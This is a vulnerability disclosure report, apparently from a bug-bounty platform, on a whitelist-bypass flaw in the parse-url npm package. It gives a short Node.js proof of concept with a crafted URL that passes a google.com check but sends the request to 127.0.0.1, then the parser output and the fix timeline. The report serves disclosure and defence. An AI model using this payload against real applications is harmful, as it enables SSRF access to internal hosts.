Malicious usage of '+' in protocol can lead to whitelist bypasses in ionicabizau/parse-url

Valid

Reported on

Mar 13th 2022


Description

Malicious usage of '+' in protocol can lead to whitelist bypasses.

Proof of Concept

The following PoC shows how if parse-url is used to check the resource of a URL against a whitelist, we can bypass a whitelist check for google.com, and then convince the standard HTTP client in NodeJS to make a request to 127.0.0.1.

const parse = require('parse-url')
const http = require('http')

const url = parse("http:+@127.0.0.1://google.com")

if (url.resource === "google.com") {
   http.get(url.href)
}

This is due to parse-url will only locate the resource section only after :// whilst other URL parsers such as the WHATWG URL parser will stop the resource section at :

{
  protocols: [ 'http:', '@127.0.0.1' ],
  protocol: 'http:',
  port: null,
  resource: 'google.com',
  user: '',
  pathname: '',
  hash: '',
  search: '',
  href: 'http:+@127.0.0.1://google.com',
  query: [Object: null prototype] {}
}

Impact

This vulnerability is capable of blacklist / whitelist SSRF bypasses

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. 5 months ago
haxatron modified the report
5 months ago
haxatron modified the report
5 months ago
haxatron modified the report
5 months ago
haxatron modified the report
5 months ago
haxatron modified the report
5 months ago
Ionică Bizău (Johnny B.) validated this vulnerability 5 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Adam Nygate
5 months ago

Admin


Hi Haxatron! The impact of this parsing issue is unclear and I'm not sure if this would constitute a vulnerability. For the proposed impact to be true, the parser would need to indicate that data should be loaded from one resource, whilst providing a different resource to a potential whitelist. How can this be?

Adjusting the severity until this is clear.

We have sent a fix follow up to the ionicabizau/parse-url team. We will try again in 7 days. 5 months ago
We have sent a second fix follow up to the ionicabizau/parse-url team. We will try again in 10 days. 5 months ago
We have sent a third and final fix follow up to the ionicabizau/parse-url team. This report is now considered stale. 4 months ago
Ionică Bizău (Johnny B.) confirmed that a fix has been merged on 21c72a 2 months ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty
index.js#L35L49 has been validated
to join this conversation